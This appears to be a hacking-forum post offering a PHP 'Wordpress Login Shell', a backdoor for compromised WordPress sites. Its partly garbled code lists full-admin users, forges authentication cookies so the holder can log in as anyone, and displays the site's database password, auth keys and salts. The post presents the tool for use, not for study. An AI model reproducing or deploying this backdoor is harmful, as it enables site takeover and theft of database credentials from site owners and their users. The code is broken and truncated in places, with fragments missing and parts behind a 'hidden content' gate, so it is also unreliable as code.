YOUR-AD-HERE
HOSTING
TOOLS

Locked Wordpress Login Shell

dEEpEst

Credits: jbdabes

After releasing my vBulletin Login Shell last year, I decided it was finally time to "expand" and so I wrote the Wordpress Login Shell.It's fully functional, and should find admins on the system with user level 10 (full admin). It also retrieves information like the DB connection info & important keys & nonces from that install of WP (randomly generated by installer).
[HIDE-THANKS]
ID, true, $secure_cookie); $expiration = time() + apply_filters( 'auth_cookie_expiration', 2 * DAY_IN_SECONDS, $user->ID, true ); $manager = WP_Session_Tokens::get_instance( $user->ID ); $token = $manager->create( $expiration ); wp_generate_auth_cookie( $user->ID, $expiration, 'secure_auth', $token ); do_action('wp_login', $user->user_login, $user); wp_safe_redirect(SELF);}else{ $query = "SELECT * FROM " . $table_prefix . "usermeta WHERE meta_key = 'wp_user_level' AND meta_value = '10'"; $admins = $wpdb->get_results($query); $usernames = array(); $admin_count = count($admins); for($i=0;$iuser_id . "'"; $admin = $wpdb->get_row($query, 'ARRAY_A'); $usernames[] .= '' . $admin['user_login'] . ''; } $usernames = implode(',', $usernames);?>

WordPress Login Shell | CP Login

Users with admin permissions:

Admin directory:

Table prefix:

Cookie Hash:

Auth key:

Secure auth key:

Logged in key:

Nonce key:

Auth salt:

Secure auth salt:

Logged in salt:

Nonce salt:

Database host:

Database user:

Database pass:

Database name:

Written by
This is the hidden content, please
. This file allows you to override the default WordPress login system and login to the control panel as anyone.
This is the hidden content, please

[/HIDE-THANKS]